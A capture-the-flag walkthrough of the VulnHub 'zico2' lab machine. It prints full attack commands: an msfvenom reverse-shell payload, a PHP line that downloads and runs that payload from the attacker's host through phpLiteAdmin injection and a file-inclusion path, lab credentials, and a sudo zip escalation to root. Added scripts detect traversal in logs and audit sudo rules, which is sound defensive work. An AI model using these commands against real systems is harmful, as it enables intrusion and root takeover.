zico2: 1 Vulnhub — Walkthrough

Level: Intermediate

Goal: Get root and read the flag file

Description:

Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?

Hint: Enumerate, enumerate, and enumerate!

Thanks to: VulnHub

Let's start with an Nmap scan

Nmap 7.70 scan initiated Sun Apr 14 21:48:17 2019 as: nmap -sC -sV -oA zico 192.168.1.4
Nmap scan report for 192.168.1.4
Host is up (0.00034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 43088/tcp status
|_ 100024 1 51467/udp status
MAC Address: 08:00:27:A0:F9:63 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Apr 14 21:48:24 2019 -- 1 IP address (1 host up) scanned in 7.24 seconds

Web Server Enumeration

Let's check the tools page

LFI

Gobuster

[email protected]:~/machines/zico# gobuster -u http://192.168.1.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain : http://192.168.1.4/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
2019/04/14 21:49:34 Starting gobuster
/img (Status: 301)
/index (Status: 200)
/tools (Status: 200)
/view (Status: 200)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/package (Status: 200)
/LICENSE (Status: 200)
/less (Status: 301)
/server-status (Status: 403)
/dbadmin (Status: 301)
2019/04/14 21:50:16 Finished
[email protected]:~/machines/zico#

PhpLiteAdmin

The dbadmin directory found above contains a phpLiteAdmin 1.9.3 installation, which is vulnerable to remote PHP code injection and, as it turns out, was left with the default admin password:

Browsing it, there was a table containing two usernames and their password hashes:

I googled the hashes and tried to log in to SSH using the decrypted passwords, but unfortunately that did not work.

A searchsploit query then turned up https://www.exploit-db.com/exploits/24044/, which is what we will exploit now.

EXPLOITING

So I figured what I would do is the following:

  1. Create a reverse shell executable that connects back to my Kali box
  2. Share the executable via a python http server
  3. Start up a meterpreter listener
  4. Create some PHP code to download the executable, make it executable, and execute it to open the reverse shell
  5. Profit?

Step 1, create the reverse shell executable.

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.79 LPORT=443 -f elf -o /tmp/rshell

Run the HTTP server to host the file for download.

[email protected]:/tmp# python -m SimpleHTTPServer

Start meterpreter reverse TCP handler.

[email protected]:/tmp# systemctl start postgresql
[email protected]:/tmp# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.79
LHOST => 192.168.1.79
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.79:443

Following the exploit-db advisory, create a database named rshell.php in phpLiteAdmin and a table with a text field whose default value is the following PHP:

<?php system("cd /tmp; wget 192.168.1.79:8000/rshell; chmod 777 rshell; ./rshell"); ?>

And then navigate to the following URL to run the PHP:

http://192.168.1.4/view.php?page=../../../../usr/databases/rshell.php
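On the defensive side, the view.php?page= traversal above is easy to spot in the web server's access log. The following detector is an added example, not part of the original walkthrough; the log lines are constructed to mirror that request plus single- and double-URL-encoded variants, and the parser assumes Apache's combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format log lines (not taken from the original page); the second
# request mirrors the view.php?page= traversal used above, the next two are encoded variants.
SAMPLE_LOG = """\
192.168.1.79 - - [14/Apr/2019:21:55:02 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.79 - - [14/Apr/2019:21:55:10 +0000] "GET /view.php?page=../../../../usr/databases/rshell.php HTTP/1.1" 200 42 "-" "Mozilla/5.0"
192.168.1.79 - - [14/Apr/2019:21:55:14 +0000] "GET /view.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1700 "-" "curl/7.64.0"
192.168.1.79 - - [14/Apr/2019:21:55:20 +0000] "GET /view.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1700 "-" "curl/7.64.0"
192.168.1.79 - - [14/Apr/2019:21:56:01 +0000] "GET /index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Minimal parser for the request portion of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def normalise(value, rounds=3):
    """Percent-decode until stable so double-encoded ../ (%252e%252e%252f) is caught,
    and fold backslashes so a backslash separator is treated like a forward slash."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def is_traversal(value):
    """True when a parameter value climbs out of its directory or names an absolute path."""
    v = normalise(value)
    return "../" in v or v.startswith("/")

def find_lfi_attempts(log_text):
    """Return one record per query parameter that looks like a path traversal attempt."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl already decodes one layer; normalise() handles any further layers.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if is_traversal(value):
                hits.append({"ip": m.group("ip"), "path": parts.path, "param": name,
                             "value": normalise(value), "status": int(m.group("status"))})
    return hits

if __name__ == "__main__":
    for h in find_lfi_attempts(SAMPLE_LOG):
        print(f"{h['ip']} {h['path']} {h['param']}={h['value']} -> HTTP {h['status']}")
```

A 200 status on a flagged request, as in the constructed lines, is the signal that the include actually succeeded rather than being blocked.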

Now that we have a shell, let's move on.

cd /home

Let's check wordpress/wp-config.php; it contains database credentials:

Username: zico
Password: sWfCsfJSPV9H3AmQzw8

Let's log in via SSH with them:

ssh zico@192.168.1.4

Privilege Escalation

sudo -l

[email protected]:~$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip

We can escalate privileges via the zip command: when testing an archive with -T, zip runs whatever --unzip-command is given, and since the rule is NOPASSWD as root, that command runs as root.

sudo zip .bash_logout.zip .bash_logout -T --unzip-command="sh -c /bin/bash"

[email protected]:~$ sudo zip .bash_logout.zip .bash_logout -T --unzip-command="sh -c /bin/bash"
adding: .bash_logout (deflated 28%)
[email protected]:~# whoami
root
[email protected]:~#
[email protected]:/root# cat flag.txt 
#
#
#
ROOOOT!
You did it! Congratz!

Hope you enjoyed!


#
#
[email protected]:/root#
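The root cause here is a sudoers rule that grants an archiver as root with unrestricted arguments. As an added example (not part of the original walkthrough), the following audit script parses `sudo -l` output modelled on the zico host above and flags such rules; the allow-list of shell-capable binaries holds only the two from this page and would be extended in practice.

```python
import re

# Constructed `sudo -l` output modelled on the zico host above (not captured from a real system);
# the last rule is added to show an argument-restricted entry that should not be flagged.
SAMPLE_SUDO_L = """\
Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/apt-get update
"""

# The two binaries from the page's sudo -l output (both path variants); zip -T --unzip-command,
# used above, runs an arbitrary command, so granting it as root is equivalent to granting a root shell.
SHELL_CAPABLE = {"/bin/tar", "/usr/bin/tar", "/bin/zip", "/usr/bin/zip"}

RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$')

def parse_sudo_rules(text):
    """Parse the '(runas) TAG: command args' lines of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(root : root)" lists run-as user(s) before the colon and group(s) after it.
        runas_users = [u.strip() for u in m.group("runas").split(":")[0].split(",")]
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        argv = m.group("cmd").split()
        rules.append({"runas": runas_users, "nopasswd": "NOPASSWD" in tags,
                      "binary": argv[0], "args": argv[1:]})
    return rules

def audit(rules):
    """Flag rules that hand out a shell-capable binary as root with no argument restriction."""
    findings = []
    for r in rules:
        as_root = any(u in ("root", "ALL") for u in r["runas"])
        if as_root and r["binary"] in SHELL_CAPABLE and not r["args"]:
            pw = "without a password " if r["nopasswd"] else ""
            findings.append(f"{r['binary']}: runs as root {pw}with arbitrary arguments; "
                            "restrict the arguments or replace the rule with a wrapper script")
    return findings

if __name__ == "__main__":
    for f in audit(parse_sudo_rules(SAMPLE_SUDO_L)):
        print("RISK", f)
```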

Happy Hacking…
